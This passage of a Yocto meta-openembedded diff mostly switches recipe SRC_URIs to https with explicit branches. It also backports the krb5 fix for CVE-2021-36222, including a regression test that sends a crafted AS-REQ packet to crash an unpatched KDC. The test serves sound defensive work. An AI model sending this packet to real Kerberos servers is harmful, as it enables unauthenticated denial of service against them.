a/meta-openembedded/meta-oe/recipes-bsp/ledmon/ledmon_git.bb +++ b/meta-openembedded/meta-oe/recipes-bsp/ledmon/ledmon_git.bb @@ -16,7 +16,7 @@ inherit autotools systemd SYSTEMD_SERVICE_${PN} = "ledmon.service" # 0.93 -SRC_URI = "git://github.com/intel/ledmon;branch=master \ +SRC_URI = "git://github.com/intel/ledmon;branch=master;protocol=https \ file://0002-include-sys-select.h-and-sys-types.h.patch \ file://0001-Don-t-build-with-Werror-to-fix-compile-error.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-bsp/lm_sensors/lmsensors_3.6.0.bb b/meta-openembedded/meta-oe/recipes-bsp/lm_sensors/lmsensors_3.6.0.bb index 890db55bcc..37a98a0996 100644 --- a/meta-openembedded/meta-oe/recipes-bsp/lm_sensors/lmsensors_3.6.0.bb +++ b/meta-openembedded/meta-oe/recipes-bsp/lm_sensors/lmsensors_3.6.0.bb @@ -10,7 +10,7 @@ DEPENDS = " \ virtual/libiconv \ " -SRC_URI = "git://github.com/lm-sensors/lm-sensors.git;protocol=https \ +SRC_URI = "git://github.com/lm-sensors/lm-sensors.git;protocol=https;branch=master \ file://fancontrol.init \ file://sensord.init \ " @@ -95,7 +95,7 @@ RDEPENDS_${PN} += " \ ${PN}-sensorsdetect \ ${PN}-sensorsconfconvert \ ${PN}-pwmconfig \ - ${PN}-isatools \ + ${@bb.utils.contains('MACHINE_FEATURES', 'x86', '${PN}-isatools', '', d)} \ " # libsensors packages diff --git a/meta-openembedded/meta-oe/recipes-bsp/nvme-cli/nvme-cli_1.10.1.bb b/meta-openembedded/meta-oe/recipes-bsp/nvme-cli/nvme-cli_1.10.1.bb index 4f4bb2dfab..9344c17dce 100644 --- a/meta-openembedded/meta-oe/recipes-bsp/nvme-cli/nvme-cli_1.10.1.bb +++ b/meta-openembedded/meta-oe/recipes-bsp/nvme-cli/nvme-cli_1.10.1.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=8264535c0c4e9c6c335635c4026a8022" DEPENDS = "util-linux" PV .= "+git${SRCPV}" -SRC_URI = "git://github.com/linux-nvme/nvme-cli.git \ +SRC_URI = "git://github.com/linux-nvme/nvme-cli.git;branch=master;protocol=https \ file://0001-fix-musl-compilation.patch \ " SRCREV = "1d84d6ae0c7d7ceff5a73fe174dde8b0005f6108" diff --git a/meta-openembedded/meta-oe/recipes-connectivity/gattlib/gattlib_git.bb b/meta-openembedded/meta-oe/recipes-connectivity/gattlib/gattlib_git.bb index 6b4decce51..64595d59c1 100644 --- a/meta-openembedded/meta-oe/recipes-connectivity/gattlib/gattlib_git.bb +++ b/meta-openembedded/meta-oe/recipes-connectivity/gattlib/gattlib_git.bb @@ -9,7 +9,7 @@ DEPENDS += "glib-2.0-native" PV = "0.2+git${SRCPV}" -SRC_URI = "git://github.com/labapart/gattlib.git \ +SRC_URI = "git://github.com/labapart/gattlib.git;branch=master;protocol=https \ file://dbus-avoid-strange-chars-from-the-build-dir.patch \ file://0001-cmake-Use-GNUInstallDirs.patch \ " @@ -28,5 +28,5 @@ EXTRA_OECMAKE += "-DGATTLIB_BUILD_DOCS=OFF" inherit pkgconfig cmake -FILES_${PN} = "${libdir}/* ${includedir}/*" -FILES_${PN}-dev = "${includedir}/*" +FILES_${PN} = "${libdir}/*" +FILES_${PN}-dev = "${includedir}/* ${libdir}/pkgconfig" diff --git a/meta-openembedded/meta-oe/recipes-connectivity/gensio/gensio_1.5.3.bb b/meta-openembedded/meta-oe/recipes-connectivity/gensio/gensio_1.5.3.bb index 8c97662df5..bee757d5a6 100644 --- a/meta-openembedded/meta-oe/recipes-connectivity/gensio/gensio_1.5.3.bb +++ b/meta-openembedded/meta-oe/recipes-connectivity/gensio/gensio_1.5.3.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=a0fd36908af843bcee10cb6dfc47fa67 \ SRCREV = "95ec1ab31ee97411fc37156d12061adcf0331598" PV = "1.5.3+git${SRCPV}" -SRC_URI = "git://github.com/cminyard/gensio;protocol=https \ +SRC_URI = "git://github.com/cminyard/gensio;protocol=https;branch=master \ file://0001-filter-Rename-some-variables-to-tr_stdxxx.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-connectivity/iwd/iwd_1.9.bb b/meta-openembedded/meta-oe/recipes-connectivity/iwd/iwd_1.9.bb index 25500e6501..1606f10cf9 100644 --- a/meta-openembedded/meta-oe/recipes-connectivity/iwd/iwd_1.9.bb +++ b/meta-openembedded/meta-oe/recipes-connectivity/iwd/iwd_1.9.bb @@ -5,7 +5,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=fb504b67c50331fc78734fed90fb0e09" DEPENDS = "ell" -SRC_URI = "git://git.kernel.org/pub/scm/network/wireless/iwd.git" +SRC_URI = "git://git.kernel.org/pub/scm/network/wireless/iwd.git;branch=master" SRCREV = "aa3dc1b95348dea177e9d8c2c3063b29e20fe2e9" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-connectivity/krb5/krb5/CVE-2021-36222.patch b/meta-openembedded/meta-oe/recipes-connectivity/krb5/krb5/CVE-2021-36222.patch new file mode 100644 index 0000000000..fe871cecb3 --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-connectivity/krb5/krb5/CVE-2021-36222.patch @@ -0,0 +1,121 @@ +From fc98f520caefff2e5ee9a0026fdf5109944b3562 Mon Sep 17 00:00:00 2001 +From: Joseph Sutton +Date: Wed, 7 Jul 2021 11:47:44 +1200 +Subject: [PATCH] Fix KDC null deref on bad encrypted challenge + +The function ec_verify() in src/kdc/kdc_preauth_ec.c contains a check +to avoid further processing if the armor key is NULL. However, this +check is bypassed by a call to k5memdup0() which overwrites retval +with 0 if the allocation succeeds. If the armor key is NULL, a call +to krb5_c_fx_cf2_simple() will then dereference it, resulting in a +crash. Add a check before the k5memdup0() call to avoid overwriting +retval. + +CVE-2021-36222: + +In MIT krb5 releases 1.16 and later, an unauthenticated attacker can +cause a null dereference in the KDC by sending a request containing a +PA-ENCRYPTED-CHALLENGE padata element without using FAST. + +[ghudson@mit.edu: trimmed patch; added test case; edited commit +message] + +ticket: 9007 (new) +tags: pullup +target_version: 1.19-next +target_version: 1.18-next + +CVE: CVE-2021-36222 + +Upstream-Status: Backport +[https://github.com/krb5/krb5/commit/fc98f520caefff2e5ee9a0026fdf5109944b3562] + +Signed-off-by: Yi Zhao +--- + kdc/kdc_preauth_ec.c | 3 ++- + tests/Makefile.in | 1 + + tests/t_cve-2021-36222.py | 46 +++++++++++++++++++++++++++++++++++ + 3 files changed, 49 insertions(+), 1 deletion(-) + create mode 100644 src/tests/t_cve-2021-36222.py + +diff --git a/kdc/kdc_preauth_ec.c b/kdc/kdc_preauth_ec.c +index 7e636b3f9..43a9902cc 100644 +--- a/kdc/kdc_preauth_ec.c ++++ b/kdc/kdc_preauth_ec.c +@@ -87,7 +87,8 @@ ec_verify(krb5_context context, krb5_data *req_pkt, krb5_kdc_req *request, + } + + /* Check for a configured FAST ec auth indicator. */ +- realmstr = k5memdup0(realm.data, realm.length, &retval); ++ if (retval == 0) ++ realmstr = k5memdup0(realm.data, realm.length, &retval); + if (realmstr != NULL) + retval = profile_get_string(context->profile, KRB5_CONF_REALMS, + realmstr, +diff --git a/tests/Makefile.in b/tests/Makefile.in +index fc6fcc0c3..1a1938306 100644 +--- a/tests/Makefile.in ++++ b/tests/Makefile.in +@@ -166,6 +166,7 @@ check-pytests: unlockiter s4u2self + $(RUNPYTEST) $(srcdir)/t_cve-2012-1015.py $(PYTESTFLAGS) + $(RUNPYTEST) $(srcdir)/t_cve-2013-1416.py $(PYTESTFLAGS) + $(RUNPYTEST) $(srcdir)/t_cve-2013-1417.py $(PYTESTFLAGS) ++ $(RUNPYTEST) $(srcdir)/t_cve-2021-36222.py $(PYTESTFLAGS) + $(RM) au.log + $(RUNPYTEST) $(srcdir)/t_audit.py $(PYTESTFLAGS) + $(RUNPYTEST) $(srcdir)/jsonwalker.py -d $(srcdir)/au_dict.json \ +diff --git a/tests/t_cve-2021-36222.py b/tests/t_cve-2021-36222.py +new file mode 100644 +index 000000000..57e04993b +--- /dev/null ++++ b/tests/t_cve-2021-36222.py +@@ -0,0 +1,46 @@ ++import socket ++from k5test import * ++ ++realm = K5Realm() ++ ++# CVE-2021-36222 KDC null dereference on encrypted challenge preauth ++# without FAST ++ ++s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) ++a = (hostname, realm.portbase) ++ ++m = ('6A81A0' '30819D' # [APPLICATION 10] SEQUENCE ++ 'A103' '0201' '05' # [1] pvno = 5 ++ 'A203' '0201' '0A' # [2] msg-type = 10 ++ 'A30E' '300C' # [3] padata = SEQUENCE OF ++ '300A' # SEQUENCE ++ 'A104' '0202' '008A' # [1] padata-type = PA-ENCRYPTED-CHALLENGE ++ 'A202' '0400' # [2] padata-value = "" ++ 'A48180' '307E' # [4] req-body = SEQUENCE ++ 'A007' '0305' '0000000000' # [0] kdc-options = 0 ++ 'A120' '301E' # [1] cname = SEQUENCE ++ 'A003' '0201' '01' # [0] name-type = NT-PRINCIPAL ++ 'A117' '3015' # [1] name-string = SEQUENCE-OF ++ '1B06' '6B7262746774' # krbtgt ++ '1B0B' '4B5242544553542E434F4D' ++ # KRBTEST.COM ++ 'A20D' '1B0B' '4B5242544553542E434F4D' ++ # [2] realm = KRBTEST.COM ++ 'A320' '301E' # [3] sname = SEQUENCE ++ 'A003' '0201' '01' # [0] name-type = NT-PRINCIPAL ++ 'A117' '3015' # [1] name-string = SEQUENCE-OF ++ '1B06' '6B7262746774' # krbtgt ++ '1B0B' '4B5242544553542E434F4D' ++ # KRBTEST.COM ++ 'A511' '180F' '31393934303631303036303331375A' ++ # [5] till = 19940610060317Z ++ 'A703' '0201' '00' # [7] nonce = 0 ++ 'A808' '3006' # [8] etype = SEQUENCE OF ++ '020112' '020111') # aes256-cts aes128-cts ++ ++s.sendto(bytes.fromhex(m), a) ++ ++# Make sure kinit still works. ++realm.kinit(realm.user_princ, password('user')) ++ ++success('CVE-2021-36222 regression test') +-- +2.25.1 + diff --git a/meta-openembedded/meta-oe/recipes-connectivity/krb5/krb5_1.17.1.bb b/meta-openembedded/meta-oe/recipes-connectivity/krb5/krb5_1.17.1.bb index 6164c82480..ae58e2df35 100644 --- a/meta-openembedded/meta-oe/recipes-connectivity/krb5/krb5_1.17.1.bb +++ b/meta-openembedded/meta-oe/recipes-connectivity/krb5/krb5_1.17.1.bb @@ -30,6 +30,7 @@ SRC_URI = "http://web.mit.edu/kerberos/dist/${BPN}/${SHRT_VER}/${BP}.tar.gz \ file://etc/default/krb5-admin-server \ file://krb5-kdc.service \ file://krb5-admin-server.service \ + file://CVE-2021-36222.patch \ " SRC_URI[md5sum] = "417d654c72526ac51466e7fe84608878" SRC_URI[sha256sum] = "3706d7ec2eaa773e0e32d3a87bf742ebaecae7d064e190443a3acddfd8afb181" diff --git a/meta-openembedded/meta-oe/recipes-connectivity/libimobiledevice/libimobiledevice_git.bb b/meta-openembedded/meta-oe/recipes-connectivity/libimobiledevice/libimobiledevice_git.bb index 908b98d8c5..b1a9ed7ec6 100644 --- a/meta-openembedded/meta-oe/recipes-connectivity/libimobiledevice/libimobiledevice_git.bb +++ b/meta-openembedded/meta-oe/recipes-connectivity/libimobiledevice/libimobiledevice_git.bb @@ -12,7 +12,7 @@ DEPENDS = "libplist usbmuxd libusbmuxd libtasn1 gnutls libgcrypt" SRCREV = "fb71aeef10488ed7b0e60a1c8a553193301428c0" PV = "1.2.0+git${SRCPV}" SRC_URI = "\ - git://github.com/libimobiledevice/libimobiledevice;protocol=https \ + git://github.com/libimobiledevice/libimobiledevice;protocol=https;branch=master \ file://configure-fix-largefile.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-connectivity/libndp/libndp_1.7.bb b/meta-openembedded/meta-oe/recipes-connectivity/libndp/libndp_1.7.bb index 07a7a1d239..2537963dda 100644 --- a/meta-openembedded/meta-oe/recipes-connectivity/libndp/libndp_1.7.bb +++ b/meta-openembedded/meta-oe/recipes-connectivity/libndp/libndp_1.7.bb @@ -3,7 +3,7 @@ HOMEPAGE = "http://libndp.org/" LICENSE = "LGPLv2.1" LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" -SRC_URI = "git://github.com/jpirko/libndp \ +SRC_URI = "git://github.com/jpirko/libndp;branch=master;protocol=https \ " # tag for v1.6 SRCREV = "96674e7d4f4d569c2c961e865cc16152dfab5f09" diff --git a/meta-openembedded/meta-oe/recipes-connectivity/libtorrent/libtorrent_git.bb b/meta-openembedded/meta-oe/recipes-connectivity/libtorrent/libtorrent_git.bb index 3ee69554b6..b4094dd6f3 100644 --- a/meta-openembedded/meta-oe/recipes-connectivity/libtorrent/libtorrent_git.bb +++ b/meta-openembedded/meta-oe/recipes-connectivity/libtorrent/libtorrent_git.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=393a5ca445f6965873eca0259a17f833" DEPENDS = "zlib libsigc++-2.0 openssl cppunit" -SRC_URI = "git://github.com/rakshasa/libtorrent \ +SRC_URI = "git://github.com/rakshasa/libtorrent;branch=master;protocol=https \ file://don-t-run-code-while-configuring-package.patch \ " SRCREV = "756f70010779927dc0691e1e722ed433d5d295e1" diff --git a/meta-openembedded/meta-oe/recipes-connectivity/libuv/libuv_1.36.0.bb b/meta-openembedded/meta-oe/recipes-connectivity/libuv/libuv_1.36.0.bb index 7577207318..41e95f56ae 100644 --- a/meta-openembedded/meta-oe/recipes-connectivity/libuv/libuv_1.36.0.bb +++ b/meta-openembedded/meta-oe/recipes-connectivity/libuv/libuv_1.36.0.bb @@ -5,7 +5,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=a68902a430e32200263d182d44924d47" SRCREV = "533b738838ad8407032e14b6772b29ef9af63cfa" -SRC_URI = "git://github.com/libuv/libuv;branch=v1.x \ +SRC_URI = "git://github.com/libuv/libuv;branch=v1.x;protocol=https \ file://CVE-2020-8252.patch" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-connectivity/paho-mqtt-c/paho-mqtt-c_1.3.2.bb b/meta-openembedded/meta-oe/recipes-connectivity/paho-mqtt-c/paho-mqtt-c_1.3.2.bb index 3a1222e89e..d070111e95 100644 --- a/meta-openembedded/meta-oe/recipes-connectivity/paho-mqtt-c/paho-mqtt-c_1.3.2.bb +++ b/meta-openembedded/meta-oe/recipes-connectivity/paho-mqtt-c/paho-mqtt-c_1.3.2.bb @@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = " \ file://about.html;md5=e5662cbb5f8fd5c9faac526e4077898e \ " -SRC_URI = "git://github.com/eclipse/paho.mqtt.c;protocol=http \ +SRC_URI = "git://github.com/eclipse/paho.mqtt.c;protocol=http;branch=master;protocol=https \ file://0001-Fix-bug-of-free-with-musl.patch" SRCREV = "3148fe2d5f4b87e16266dfe559c0764e16ca0546" diff --git a/meta-openembedded/meta-oe/recipes-connectivity/rabbitmq-c/rabbitmq-c_0.10.0.bb b/meta-openembedded/meta-oe/recipes-connectivity/rabbitmq-c/rabbitmq-c_0.10.0.bb index 2ef6b187e9..bbc311ee1e 100644 --- a/meta-openembedded/meta-oe/recipes-connectivity/rabbitmq-c/rabbitmq-c_0.10.0.bb +++ b/meta-openembedded/meta-oe/recipes-connectivity/rabbitmq-c/rabbitmq-c_0.10.0.bb @@ -3,7 +3,7 @@ HOMEPAGE = "https://github.com/alanxz/rabbitmq-c" LIC_FILES_CHKSUM = "file://LICENSE-MIT;md5=6b7424f9db80cfb11fdd5c980b583f53" LICENSE = "MIT" -SRC_URI = "git://github.com/alanxz/rabbitmq-c.git" +SRC_URI = "git://github.com/alanxz/rabbitmq-c.git;branch=master;protocol=https" # v0.10.0-master SRCREV = "ffe918a5fcef72038a88054dca3c56762b1953d4" diff --git a/meta-openembedded/meta-oe/recipes-connectivity/rtorrent/rtorrent_git.bb b/meta-openembedded/meta-oe/recipes-connectivity/rtorrent/rtorrent_git.bb index 331f978f86..41fb1ec826 100644 --- a/meta-openembedded/meta-oe/recipes-connectivity/rtorrent/rtorrent_git.bb +++ b/meta-openembedded/meta-oe/recipes-connectivity/rtorrent/rtorrent_git.bb @@ -5,7 +5,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" DEPENDS = "libsigc++-2.0 curl cppunit libtorrent ncurses" -SRC_URI = "git://github.com/rakshasa/rtorrent \ +SRC_URI = "git://github.com/rakshasa/rtorrent;branch=master;protocol=https \ file://don-t-run-code-while-configuring-package.patch \ " # v0.9.8 diff --git a/meta-openembedded/meta-oe/recipes-connectivity/usbmuxd/usbmuxd_git.bb b/meta-openembedded/meta-oe/recipes-connectivity/usbmuxd/usbmuxd_git.bb index 7284234326..7993e608db 100644 --- a/meta-openembedded/meta-oe/recipes-connectivity/usbmuxd/usbmuxd_git.bb +++ b/meta-openembedded/meta-oe/recipes-connectivity/usbmuxd/usbmuxd_git.bb @@ -10,7 +10,7 @@ inherit autotools pkgconfig gitpkgv systemd PKGV = "${GITPKGVTAG}" SRCREV = "ee85938c21043ef5f7cd4dfbc7677f385814d4d8" -SRC_URI = "git://github.com/libimobiledevice/usbmuxd;protocol=https" +SRC_URI = "git://github.com/libimobiledevice/usbmuxd;protocol=https;branch=master" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-connectivity/wifi-test-suite/wifi-test-suite_git.bb b/meta-openembedded/meta-oe/recipes-connectivity/wifi-test-suite/wifi-test-suite_git.bb index 99cfb32051..dd2b4392c2 100644 --- a/meta-openembedded/meta-oe/recipes-connectivity/wifi-test-suite/wifi-test-suite_git.bb +++ b/meta-openembedded/meta-oe/recipes-connectivity/wifi-test-suite/wifi-test-suite_git.bb @@ -9,7 +9,7 @@ SECTION = "test" S = "${WORKDIR}/git" SRCREV = "f7a8d7ef7d1a831c1bb47de21fa083536ea2f3a9" -SRC_URI = "git://github.com/Wi-FiTestSuite/Wi-FiTestSuite-Linux-DUT.git \ +SRC_URI = "git://github.com/Wi-FiTestSuite/Wi-FiTestSuite-Linux-DUT.git;branch=master;protocol=https \ file://0001-Use-toolchain-from-environment-variables.patch \ file://0002-Add-missing-include-removes-unnedded-stuff-and-add-n.patch \ file://0003-fix-path-to-usr-sbin-for-script-and-make-script-for-.patch \ diff --git a/meta-openembedded/meta-oe/recipes-connectivity/zeromq/cppzmq_git.bb b/meta-openembedded/meta-oe/recipes-connectivity/zeromq/cppzmq_git.bb index 0b66970a9d..2a435897d3 100644 --- a/meta-openembedded/meta-oe/recipes-connectivity/zeromq/cppzmq_git.bb +++ b/meta-openembedded/meta-oe/recipes-connectivity/zeromq/cppzmq_git.bb @@ -7,7 +7,7 @@ DEPENDS = "zeromq" SRCREV = "8d5c9a88988dcbebb72939ca0939d432230ffde1" PV = "4.6.0" -SRC_URI = "git://github.com/zeromq/cppzmq.git" +SRC_URI = "git://github.com/zeromq/cppzmq.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-core/dbus/dbus-daemon-proxy_git.bb b/meta-openembedded/meta-oe/recipes-core/dbus/dbus-daemon-proxy_git.bb index 42cd032c22..f40b48836a 100644 --- a/meta-openembedded/meta-oe/recipes-core/dbus/dbus-daemon-proxy_git.bb +++ b/meta-openembedded/meta-oe/recipes-core/dbus/dbus-daemon-proxy_git.bb @@ -6,7 +6,7 @@ SRCREV = "1226a0a1374628ff191f6d8a56000be5e53e7608" PV = "0.0.0+gitr${SRCPV}" PR = "r1.59" -SRC_URI = "git://github.com/alban/dbus-daemon-proxy \ +SRC_URI = "git://github.com/alban/dbus-daemon-proxy;branch=master;protocol=https \ file://0001-dbus-daemon-proxy-Return-DBUS_HANDLER_RESULT_NOT_YET.patch \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-core/emlog/emlog.inc b/meta-openembedded/meta-oe/recipes-core/emlog/emlog.inc index 9a0f9ba928..948e18da4d 100644 --- a/meta-openembedded/meta-oe/recipes-core/emlog/emlog.inc +++ b/meta-openembedded/meta-oe/recipes-core/emlog/emlog.inc @@ -3,7 +3,7 @@ most recent (and only the most recent) output from a process" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" -SRC_URI = "git://github.com/nicupavel/emlog.git;protocol=http" +SRC_URI = "git://github.com/nicupavel/emlog.git;protocol=http;branch=master;protocol=https" SRCREV = "aee53e8dee862f35291242ba41b0ca88010f6c71" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-core/glfw/glfw_3.3.bb b/meta-openembedded/meta-oe/recipes-core/glfw/glfw_3.3.bb index 0fcf716c8e..c920cbd507 100644 --- a/meta-openembedded/meta-oe/recipes-core/glfw/glfw_3.3.bb +++ b/meta-openembedded/meta-oe/recipes-core/glfw/glfw_3.3.bb @@ -12,7 +12,7 @@ inherit pkgconfig cmake features_check PV .= "+git${SRCPV}" SRCREV = "781fbbadb0bccc749058177b1385c82da9ace880" -SRC_URI = "git://github.com/glfw/glfw.git" +SRC_URI = "git://github.com/glfw/glfw.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-core/libnfc/libnfc_git.bb b/meta-openembedded/meta-oe/recipes-core/libnfc/libnfc_git.bb index 2851ecf9fe..65586247a2 100644 --- a/meta-openembedded/meta-oe/recipes-core/libnfc/libnfc_git.bb +++ b/meta-openembedded/meta-oe/recipes-core/libnfc/libnfc_git.bb @@ -11,7 +11,7 @@ PV = "1.7.1+git${SRCPV}" S = "${WORKDIR}/git" SRCREV = "2d4543673e9b76c02679ca8b89259659f1afd932" -SRC_URI = "git://github.com/nfc-tools/libnfc.git \ +SRC_URI = "git://github.com/nfc-tools/libnfc.git;branch=master;protocol=https \ file://0001-usbbus-Include-stdint.h-for-uintX_t.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-core/mdbus2/mdbus2_git.bb b/meta-openembedded/meta-oe/recipes-core/mdbus2/mdbus2_git.bb index 82f2cf8c94..fa98e1cb46 100644 --- a/meta-openembedded/meta-oe/recipes-core/mdbus2/mdbus2_git.bb +++ b/meta-openembedded/meta-oe/recipes-core/mdbus2/mdbus2_git.bb @@ -6,7 +6,7 @@ DEPENDS = "readline" PV = "2.3.3+git${SRCPV}" -SRC_URI = "git://github.com/freesmartphone/mdbus.git;protocol=http" +SRC_URI = "git://github.com/freesmartphone/mdbus.git;protocol=http;branch=master;protocol=https" SRCREV = "28202692d0b441000f4ddb8f347f72d1355021aa" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-core/ndctl/ndctl_v67.bb b/meta-openembedded/meta-oe/recipes-core/ndctl/ndctl_v67.bb index da0c6563a7..19d96414d3 100644 --- a/meta-openembedded/meta-oe/recipes-core/ndctl/ndctl_v67.bb +++ b/meta-openembedded/meta-oe/recipes-core/ndctl/ndctl_v67.bb @@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=e66651809cac5da60c8b80e9e4e79e08" inherit autotools-brokensep pkgconfig bash-completion systemd SRCREV = "637bb424dc317a044c722a671355ef9df0e0d30f" -SRC_URI = "git://github.com/pmem/ndctl.git" +SRC_URI = "git://github.com/pmem/ndctl.git;branch=master;protocol=https" DEPENDS = "kmod udev json-c keyutils" diff --git a/meta-openembedded/meta-oe/recipes-core/opencl-headers/opencl-headers_git.bb b/meta-openembedded/meta-oe/recipes-core/opencl-headers/opencl-headers_git.bb index dec1bea566..67446ce579 100644 --- a/meta-openembedded/meta-oe/recipes-core/opencl-headers/opencl-headers_git.bb +++ b/meta-openembedded/meta-oe/recipes-core/opencl-headers/opencl-headers_git.bb @@ -6,7 +6,7 @@ SECTION = "base" S = "${WORKDIR}/git" SRCREV = "40c5d226c7c0706f0176884e9b94b3886679c983" -SRC_URI = "git://github.com/KhronosGroup/OpenCL-Headers.git" +SRC_URI = "git://github.com/KhronosGroup/OpenCL-Headers.git;branch=master;protocol=https" do_configure[noexec] = "1" do_compile[noexec] = "1" diff --git a/meta-openembedded/meta-oe/recipes-core/opencl-icd-loader/opencl-icd-loader_git.bb b/meta-openembedded/meta-oe/recipes-core/opencl-icd-loader/opencl-icd-loader_git.bb index 7c49c8d552..1396dc9bfa 100644 --- a/meta-openembedded/meta-oe/recipes-core/opencl-icd-loader/opencl-icd-loader_git.bb +++ b/meta-openembedded/meta-oe/recipes-core/opencl-icd-loader/opencl-icd-loader_git.bb @@ -8,7 +8,7 @@ inherit pkgconfig cmake S = "${WORKDIR}/git" SRCREV = "b342ff7b7f70a4b3f2cfc53215af8fa20adc3d86" -SRC_URI = "git://github.com/KhronosGroup/OpenCL-ICD-Loader.git" +SRC_URI = "git://github.com/KhronosGroup/OpenCL-ICD-Loader.git;branch=master;protocol=https" do_install () { install -d ${D}${bindir} diff --git a/meta-openembedded/meta-oe/recipes-core/safec/safec_3.5.1.bb b/meta-openembedded/meta-oe/recipes-core/safec/safec_3.5.1.bb index 91d8fc65a0..29158094a1 100644 --- a/meta-openembedded/meta-oe/recipes-core/safec/safec_3.5.1.bb +++ b/meta-openembedded/meta-oe/recipes-core/safec/safec_3.5.1.bb @@ -9,7 +9,7 @@ inherit autotools pkgconfig S = "${WORKDIR}/git" # v08112019 SRCREV = "ad76c7b1dbd0403b0c9decf54164fcce271c590f" -SRC_URI = "git://github.com/rurban/safeclib.git \ +SRC_URI = "git://github.com/rurban/safeclib.git;branch=master;protocol=https \ " COMPATIBLE_HOST = '(x86_64|i.86|powerpc|powerpc64|arm|aarch64|mips).*-linux' diff --git a/meta-openembedded/meta-oe/recipes-core/sdbus-c++/sdbus-c++-0.8.1/0001-Try-to-first-find-googletest-in-the-system-before-do.patch b/meta-openembedded/meta-oe/recipes-core/sdbus-c++/sdbus-c++-0.8.1/0001-Try-to-first-find-googletest-in-the-system-before-do.patch new file mode 100644 index 0000000000..89cb593e60 --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-core/sdbus-c++/sdbus-c++-0.8.1/0001-Try-to-first-find-googletest-in-the-system-before-do.patch @@ -0,0 +1,96 @@ +From b073e1c2b9a8138da83300f598b9a56fc9762b4b Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Stanislav=20Angelovi=C4=8D?= +Date: Mon, 16 Nov 2020 17:05:36 +0100 +Subject: [PATCH] Try to first find googletest in the system before downloading + it (#125) + +Upstream-Status: Backport [d6fdaca] +Signed-off-by: Martin Jansa + +--- + tests/CMakeLists.txt | 62 ++++++++++++++++++++++++++++---------------- + 1 file changed, 40 insertions(+), 22 deletions(-) + +diff --git a/tests/CMakeLists.txt b/tests/CMakeLists.txt +index 97f7c1a..7ecc327 100644 +--- a/tests/CMakeLists.txt ++++ b/tests/CMakeLists.txt +@@ -2,26 +2,44 @@ + # DOWNLOAD AND BUILD OF GOOGLETEST + #------------------------------- + +-include(FetchContent) +- +-message("Fetching googletest...") +-FetchContent_Declare(googletest +- GIT_REPOSITORY https://github.com/google/googletest.git +- GIT_TAG master +- GIT_SHALLOW 1 +- UPDATE_COMMAND "") +- +-#FetchContent_MakeAvailable(googletest) # Not available in CMake 3.13 :-( Let's do it manually: +-FetchContent_GetProperties(googletest) +-if(NOT googletest_POPULATED) +- FetchContent_Populate(googletest) +- set(gtest_force_shared_crt ON CACHE INTERNAL "" FORCE) +- set(BUILD_GMOCK ON CACHE INTERNAL "" FORCE) +- set(INSTALL_GTEST OFF CACHE INTERNAL "" FORCE) +- set(BUILD_SHARED_LIBS_BAK ${BUILD_SHARED_LIBS}) +- set(BUILD_SHARED_LIBS OFF) +- add_subdirectory(${googletest_SOURCE_DIR} ${googletest_BINARY_DIR}) +- set(BUILD_SHARED_LIBS ${BUILD_SHARED_LIBS_BAK}) ++set(GOOGLETEST_VERSION 1.10.0 CACHE STRING "Version of gmock to use") ++set(GOOGLETEST_GIT_REPO "https://github.com/google/googletest.git" CACHE STRING "A git repo to clone and build googletest from if gmock is not found in the system") ++ ++find_package(GTest ${GOOGLETEST_VERSION} CONFIG) ++if (NOT TARGET GTest::gmock) ++ # Try pkg-config if GTest was not found through CMake config ++ find_package(PkgConfig) ++ if (PkgConfig_FOUND) ++ pkg_check_modules(GMock IMPORTED_TARGET GLOBAL gmock>=${GOOGLETEST_VERSION}) ++ if(TARGET PkgConfig::GMock) ++ add_library(GTest::gmock ALIAS PkgConfig::GMock) ++ endif() ++ endif() ++ # GTest was not found in the system, build it on our own ++ if (NOT TARGET GTest::gmock) ++ include(FetchContent) ++ ++ message("Fetching googletest...") ++ FetchContent_Declare(googletest ++ GIT_REPOSITORY ${GOOGLETEST_GIT_REPO} ++ GIT_TAG release-${GOOGLETEST_VERSION} ++ GIT_SHALLOW 1 ++ UPDATE_COMMAND "") ++ ++ #FetchContent_MakeAvailable(googletest) # Not available in CMake 3.13 :-( Let's do it manually: ++ FetchContent_GetProperties(googletest) ++ if(NOT googletest_POPULATED) ++ FetchContent_Populate(googletest) ++ set(gtest_force_shared_crt ON CACHE INTERNAL "" FORCE) ++ set(BUILD_GMOCK ON CACHE INTERNAL "" FORCE) ++ set(INSTALL_GTEST OFF CACHE INTERNAL "" FORCE) ++ set(BUILD_SHARED_LIBS_BAK ${BUILD_SHARED_LIBS}) ++ set(BUILD_SHARED_LIBS OFF) ++ add_subdirectory(${googletest_SOURCE_DIR} ${googletest_BINARY_DIR}) ++ set(BUILD_SHARED_LIBS ${BUILD_SHARED_LIBS_BAK}) ++ add_library(GTest::gmock ALIAS gmock) ++ endif() ++ endif() + endif() + + 